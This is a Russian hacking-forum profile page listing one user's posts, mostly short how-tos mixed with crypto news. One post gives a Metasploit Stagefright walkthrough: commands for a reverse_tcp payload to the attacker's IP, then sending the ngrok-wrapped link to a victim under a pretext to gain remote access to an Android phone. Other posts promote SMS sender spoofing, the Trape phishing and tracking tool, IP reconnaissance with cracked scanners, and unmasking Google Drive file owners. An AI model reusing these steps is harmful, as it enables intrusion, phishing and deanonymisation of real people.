BTC: 58581 USD
ETH: 1916 USD
BCH: 532 USD
LTC: 196 USD
DASH: 222 USD
Перейти к содержанию


Edbka

Пользователи
  • Публикаций

    390
  • Зарегистрирован

  • Посещение

  • Победитель дней

    1

Edbka стал победителем дня 8 апр 2020

Edbka имел наиболее популярный контент!

2 Подписчика

Информация о Edbka

  • Звание
    Rank №5

Посетители профиля

1,157 просмотров профиля
  1. Поднял 353$ за три дня, спасибо ТС!
  2. Большое спасибо за помощь! Очень доволен сделкой)) Удачной работы!!!
  3. Сегодня мы научимся писать SMS друзьям с любых номеров. Сразу к делу: 1. Переходим на сайт https://smsend.ru/ 2. Заполняем поля и нажимаем "Send". 3. Отправляем SMS и радуемся добыче.
  4. Поисковые системы отслеживают ваши запросы и переходны на сайты для того, чтобы предлагать рекламу на основе ваших интересов. Расширение TrackMeNot для Firefox предназначено для борьбы с подобным трекингом. Оно будет «обманывать» трекеры, отправляя поисковым системам случайные запросы, на основе которых вам и будет показываться реклама. В настройках плагина вы можете указать, какие поисковые системы вы хотите «обмануть». Вы также можете выбрать периодичность отправки рандомизированных запросов или ведение их журнала.
  5. Сегодня мы рассмотрим утилиту под названием Metasploit. С ее помощью можно получить полный удалённый доступ к смартфону на Android. Эксплуатировать будем уязвимость - Stagefright. Она актуальна на относительно старых версиях Android (5.0 - 5.1.1). Инструкция по установке: Установка Metasploit на Termux — (https://codeby.net/threads/ustanovka-metasploit-na-termux.68433/)Установка Metasploit на Linux — (https://itsecforu.ru/2018/09/26/%D0%BA%D0%B0%D0%BA-%D1%83%D1%81%D1%82%D0%B0%D0%BD%D0%BE%D0%B2%D0%B8%D1%82%D1%8C-metasploit-framework-%D0%BD%D0%B0-ubuntu-linux-mint/)Если у вас Kali Linux (https://www.kali.org/downloads/), то Metasploit уже стоит из коробки. Если Stagefright нет в Metasploit, то скачиваем его — (https://www.exploit-db.com/exploits/40436) и закидываем в папку с эксплоитами. Использование: msfconsole — открытие консоли use exploit/android/browser/stagefright_mp4_tx3g_64bit — подключение эксплоита set SRVHOST вашIP set URIPATH / set PAYLOAD linux/armle/mettle/reverse_tcp set LHOST вашIP set VERBOSE true exploit -j — запуск эксплоита Сгенерируется ссылка, которую надо завернуть в ngrok, а потом неплохо было бы замаскировать — (https://pastebin.com/9tA3X15K). После этого нужно отправить готовую ссылку под любым предлогом, а при переходе по ссылке откроется новая сессия для удалённого доступа.
  6. Власти китайского города Сучжоу проведут тестирование государственной цифровой валюты, раздав жителям города 30 млн юаней (около $5 млн). Администрация Сучжоу сообщила, что раздача цифрового юаня будет происходить в виде лотереи. Между 150 000 жителями города будет распределено по 200 цифровых юаней (около $31). О результатах розыгрыша станет известно 10 февраля, а победители должны будут потратить средства с 10 по 26 февраля в магазинах, где принимаются цифровые юани. Местные власти пояснили, что это будет последнее тестирование актива в городе. Сучжоу уже проводил бесплатную раздачу цифровых юаней в декабре, чтобы оценить удобство государственной криптовалюты перед ее официальным запуском. По данным местных СМИ, следующее тестирование цифрового юаня будет проводиться в городе Чэнду. В прошлом месяце в Шэньчжэне была организована уже третья бесплатная лотерея в честь Весеннего фестиваля, в рамках которой каждому победителю тоже досталось по 200 монет. Можно сказать, что благодаря такому количеству общегородских тестирований цифровая валюта Китая становится реальным платежным средством. Кроме того, несколько месяцев назад НБК начал вести переговоры с Управлением денежного обращения Гонконга (HKMA) о тестировании цифрового юаня для международных платежей с целью его продвижения в мировой финансовой системе.
  7. На CoinMarketCap появился токен WallStreetBets (WSB), занявший нулевое место впереди BTC по капитализации. Эта шутка связана с «местью» пользователей Reddit институциональным трейдерам. Сервис CoinMarketCap опубликовал предупреждение на странице о WSB, что на самом деле такого актива не существует. Это означает, что биткоин по-прежнему остается лидером криптовалютного рынка. Вымышленный токен оценивается в $483, а его капитализация составляет $24.8 млрд. В обороте находится 51 442 000 WSB, а ежедневный объем торгов WSB якобы насчитывает $100 млн. Эти цифры возникли не на пустом месте. Скорее всего, они обозначают показатели американской розничной сети GameStop, продающей игровые приставки и компьютерные игры. Ее акции оказались предметом спора между хедж-фондами, открывшими позиции на понижение, и тысячами пользователей сабреддита WallStreetBets, начавших массовую скупку, чтобы «наказать» рыночных манипуляторов.
  8. Американский предприниматель Илон Маск (Elon Musk) 29 января опубликовал в Twitter сообщение с текстом «это было неизбежно» относительно биткоина, что привлекло к криптовалюте внимание всего мира. В результате публикации твита курс первой криптовалюты за несколько минут подскочил с $32 000 до $37 000, а на криптовалютной бирже Binance был зафиксирован рекордный приток новых пользователей. Из-за этого площадка даже приостановила вывод средств на короткий промежуток времени. Отметим, что сообщение Илона Маска стало не единственным катализатором роста курса первой криптовалюты – 29 января также был срок экспирации опционов на биткоин на сумму $3.2 млрд. «Сразу после экспирации биткоин вырос на $5 000. Причиной стала либо сама экспирация, либо твит Маска», – отметил операционный директор биржи криптовалютных деривативов Deribit Луук Страйерс (Luuk Strijers).
  9. Приветствую друзья! Хочу привести пример того, что сможет узнать о Вас злоумышленник имея на руках Ваш айпи-адрес (или наоборот). Сервисы, о которых пойдёт речь абсолютно бесплатны и находятся в открытом доступе. 1. IP-score (http://ip-score.com/checkip) — сайт проверяет на наличие в blacklists определённого IP. 2. HTMLweb (http://htmlweb.ru/) — поможет определить страну, город и район. Дополнительно есть информация о whois-server. 3. ipqualityscore (https://www.ipqualityscore.com/user/proxy-detection-api/lookup) — c помощью этого сервиса можно получить информации об использовании прокси, VPN или TOR. 4. iknowwhatyoudownload (https://iknowwhatyoudownload.com/ru/peer) — ресурс для получения информации о использовании торрент трекеров. Есть возможность создать зараженную ссылку и отправить ее «жертве».. 5. xspider-77 (https://warezok.net/windows/535-xspider-77-crack.html) (ссылка на скачивание программы) —можно получить информацию о занятых портах и уязвимостях. 6. Shadow Security Scanner (https://www.securitylab.ru/software/274763.php) (ссылка на скачивание программы) — определяет операционную систему, название машины, а также дату и время на компьютере
  10. думаю многие знают сервис Iplogger, который позволяет узнать IP пользователя с помощью специальной ссылки, картинки, битого пикселя. Сервис очень удобный и полезный. Но из-за его большого функционала можно самому попасться и светануть своим IP адресом. Как же защититься от IPlogger? 1. Нажимаем WIN+R > пишем: notepad.exe c:\windows\system32\drivers\etc\hosts 2. В самый низ вписываем: ezstat.ru 0.0.0.0 iplogger.org 0.0.0.0 2no.co 0.0.0.0 iplogger.com 0.0.0.0 iplogger.ru 0.0.0.0 yip.su 0.0.0.0 iplogger.co 0.0.0.0 iplogger.info 0.0.0.0 ipgrabber.ru 0.0.0.0 ipgraber.ru 0.0.0.0 iplis.ru 0.0.0.0 02ip.ru 3. Перезагружаем компьютер(Обязательно) Таким образом, мы заблокировали популярные домены IPlogger на нашем компьютере, тем самым обезопасили себя от утечки IP адреса. Все запросы к доменам IPlogger будут тупо закольцовываться на локальном компьютере. Грубо говоря, до интернета такой запрос не дойдет.
  11. В данном посте пойдет речь о небольшой части сайтов, которые могут оказаться для вас полезными, если вы пользуйтесь зашифрованной сетью: NotEvil (http://hss3uro2hsxfogfq.onion/) — одна из самых крупных поисковых систем. Большое количество проиндексированных страниц. OnionShare (http://lldan5gahapx5k7iafb3s4ikijc4ni7gx5iywdflkba5y2ezyg6sjgyd.onion/) — утилита с открытым исходным текстом, которая позволяет безопасно и анонимно делиться файлами любого размера. Security in a Box (http://bpo4ybbs2apk4sk4.onion/en/)— содержит множество инструкций по установке и использованию программного обеспечения и сервисов для цифровой защиты. Confidant (http://cwu7eglxcabwttzf.onion/) — электронная почта с открытым исходным кодом и функцией антиспама. Сообщения хранятся зашифрованными, администраторы не имеют доступа к содержимому. RuTor (http://rutorc6mqdinc4cz.onion/) — зеркало популярного русскоязычного торрент-трекера. Не раз подвергался блокировкам из за антипиратского законодательства, но продолжает жить до сих пор. CrypTor (http://cryptorffquolzz6.onion/) — сервис одноразовых записок с шифрованием. Есть возможность прикрепления своих файлов размером до 3 мегабайт. Для работы используется Javascript.
  12. Сегодня хочу показать вам инструмент под названием Trape, который создает фишинг ссылку, и через нее следит за пользователем. Благодаря данному инструменту можно получить такую информацию как: IP, локация, ОС. Также вы сможете удаленно запускать js скрипты, загружать файлы на ПК. Можно будет узнать на каких сервисах зарегистрирован пользователь, и даже посылать ему разные баннеры. Установка: (https://pastebin.com/kcCAaL0t)Использование: trape.py --url <ссылка на любую вебстраницу> --port 8080 После этого скрипт выдаст вам три значения. Первое - это фишинг ссылка, второе - ссылка на админ панель и третье - это пароль для входа в админ панель.
  13. В нынешнее время трудно представить человека, не знающего, что такое интернет, но зачастую большинство людей может позабыть пароль от вайфая Windows 10. В этой статье поделюсь с вами информацией, с помощью которой вы сможете посмотреть забытый пароль от Wi-Fi сети на своем компьютере с установленной Windows 10. С помощью этого способа можно узнать пароль от любой Wi-Fi сети, к которой раньше подключался ваш компьютер, или ноутбук. Если вы забыли пароль от Wi-Fi, то можете найти его по следующему способу: 1. Откройте командную строку, набрав “cmd” в поиске Windows и нажав “Запуск от имени администратора” под результатами. 2. В окне командной строки введите: “netsh wlan show profiles” Таким образом, вы узнаете имя профиля Wi-Fi, для которого пытаетесь найти пароль. 3. Теперь введите следующее: “netsh wlan show profile name=”WiFi Profile Name” key=clear” Не забудьте заменить ”WiFi Profile Name” на свое имя профиля, которое вы нашли во 2 пункте. 4. Пароль вашей сети Wi-Fi появится в поле “Key Content” или “Содержимое ключа“.
  14. 1. Откройте документ в Google Drive, например https://drive.google.com/file/d/1e8IhYxkmpTGE32vutY2EHK4BzqY60r-B/view 2. Теперь перейдите сюда (С того же аккаунта с которого посмотрели файл) 3. Откройте инструменты разработчика (Ctrl+Shift+I) и перейдите во вкладку network 4. На сайте найдите нужный документ и просто нажмите на него, он должен выделится синим цветом 5. В инструментах разработчика найдите в списке запрос с именем v2Internal (Их там может быть несколько) и нажмите на него 6. Перейдите во вкладку Preview и найдите там e-mail и имя владельца Если имени владельца с e-mail там нету выберите другой запрос с именем v2Internal
  15. Сборники инструментов предназначенных для определенного спектра атак давно стали основной составляющей базового набора для пентеста. Сюда можно добавить и фреймворк The Inspector, который включает в себя модули для получения информации о телефоне либо о домене, обхода CloudFlare и т.д. Установка: (https://pastebin.com/w4SyKxs1)Использование: perl Th3inspector.pl Теперь можно выбрать интересующую функцию, вписав её номер. К примеру для получения информации о сайте вводим 1 и потом домен. Как итог получаем списком данные геолокации хостера, ip и т.д.
×
×
  • Создать...